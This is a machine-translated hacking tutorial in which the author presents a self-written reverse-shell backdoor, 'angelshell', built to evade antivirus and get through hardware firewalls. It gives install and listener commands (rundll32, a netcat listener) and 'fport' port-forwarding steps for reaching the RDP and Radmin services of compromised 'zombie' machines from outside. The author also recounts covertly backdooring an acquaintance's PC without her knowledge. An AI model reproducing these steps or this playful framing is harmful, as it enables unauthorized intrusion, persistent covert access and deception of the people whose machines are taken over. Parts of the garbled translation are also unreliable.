Today, almost all the servers are placed behind the hardware firewall, so it is difficult to penetrate into the system. As a result, it is found that the hardware firewall is installed! Do not consider any terminal services, Radmin or other control methods. I tried it and found that almost all of them support reverse connections. Forward connections can only connect port 80 and port 21, but cannot connect port 1433. Then upload a reverse backdoor and the antivirus software will kill it. Move out of Delphi and write the backdoor by yourself! After a few days, the backdoor was finally written and reached the ideal requirements. The use effect was very good. It was enough to be called a nightmare of a hardware firewall and an Intranet bot! Don't dare to share it with others.
This Program The name is angelshell. Here I use my zombie and my computer to perform a test. First, you need to configure a local file that records the reverse connection information. The first line is your own IP address, and the second line is the port that the NC listens. Put it in the HTTP space, and configure the password and the HTTP access address you just uploaded to the FTP space.
You can choose to generate the DLL server or the EXE server, where the EXE server can be directly run to install, while the DLL server needs to install with the following command: "rundll32 dll path, I ", remember that the last I must be capitalized.
TIPS: The program author actually provides the EXE server for your convenience. In essence, it also installs the DLL program, but it only uses the program to unpack and automatically install it.
Here I will use the DLL server for demonstration. First upload the DLL to your beloved zombie, and then input "rundll32 angel. dll, I" on the command line ". Note that I am using FTP to connect to bots. For convenience, I have directly installed it through FTP command lines.
After installation, you can use "nc-V-l-P 7787" on your machine to listen to port 7787, that is, the port in the configuration file I first wrote. After a while, the NC will prompt information transmission. Enter the password and press Enter. OK. The connection is successful. After the help information is displayed, the cute shell is displayed.
TIPS: This backdoor also provides some additional commands that can be executed directly in shell. To avoid conflicts with existing program names, the additional commands are all in lowercase.
At this point, you may think that this backdoor can not only generate the EXE server, but also has nothing special. Of course, these features are not enough to create my own characteristics, nor are they a nightmare of the hardware firewall. The backdoor we used this time is not only to allow it to implement reverse connections, but also to allow all other programs with forward connections to implement reverse connections, such as Terminal Services, Radmin, and MSSQL! Don't be surprised. Let's go!
Can I see the fport additional command in shell? That is, port forwarding, which can simulate any port on the remote computer to a local computer. What? You don't understand? Well, it doesn't matter. You can see it later. Let's test the Windows terminal service first. I used to drive the Client Service for this zombie, but I have been suffering from interception by the hardware firewall and cannot connect to it. It's so nice today!
TIPS: fport usage:
Fport
Here, the local port parameter refers to the port you want to forward on the bot, And the your IP is your IP address (or domain name, yourport refers to the port listening on your client.
Open the client, enter 3389 on the "simulated port", and enter any port on the "connected to the remote computer". Of course, do not conflict with the opened port. Here I enter 7788, click "Start listening ". Enter "fport 3389 61. 187. ***. *** 7788" under the shell of the zombie ". 3389 is the port of the zombie Terminal Service, and 7788 is the port connecting to the remote computer. Then the client immediately prompts that the remote computer connection has been received, prompting that the local port 3389 can be connected. In this way, we will move port 3389 on the bot to our machine.
Friends, what are we waiting? Open the terminal service host, fill in the local IP address 127.0.0.1, and connect. The client immediately shows that a new connection has been successfully established and the Remote Desktop Login Dialog Box appears. I am so excited, the language cannot be expressed!
We try again to log on to the two users, and the client shows that a new connection is successfully established. It turns out that you have successfully logged on to two users at the same time! Of course, you can log on to more users if you like. During programming, each connection is set to transmit data through two threads, therefore, the transmission speed is guaranteed.
When I was immersed in joy, the phone rang. A mm had bought a camera and asked me to help her install the camera. How can this problem be solved? So she was asked to go to QQ, just to test it again. Although the MM does not have a hardware-level firewall, she uses Windows XP Professional Edition on the Intranet. I first sent the EXE server to her, told her to run it, and then listened locally. After a while, I will be prompted to receive the information and enter the password. Enter the password and get a shell, and then use the File Download function to install a Radmin for her. This is sinister! Then, run the following command: "fport 4899 61. 187. ***. * ** 7788 ", forward her port 4899 to my port 4899, then open Radmin viewer locally, and write 127.0.0.1 as the connection IP address. The default port 4899 is used, connection successful !.
Help her open the Device Manager and install the camera driver. mm is still there and doesn't know what's going on. Haha, that worship when she responds! I am not clamoring to worship me as a teacher, Khan ...... This is the end of the test, so don't forget it!
This program theoretically supports any protocol. However, due to the particularity of some protocols, it will verify the IP address, so it may not achieve the desired effect. For example, in the Web service, port 80 on the bot was turned around today to lie to others and say they opened a website. What is displayed in a row: "No web ...... In this ......", This is probably because the address does not have a web service. This reminds me that the value of another host in the HTTP protocol does not match. No wonder.
Finally, let's talk about how to use this program in the intranet. If you are on the Intranet, you need a zombie that allows direct connection to transfer the port of the server to this zombie, then, directly connect to the intermediate zombie, which is equivalent to connecting to the server!
Well, I hope this Article can help you. I am very grateful to you for reading this article. Finally, I wish you a happy and prosperous technology!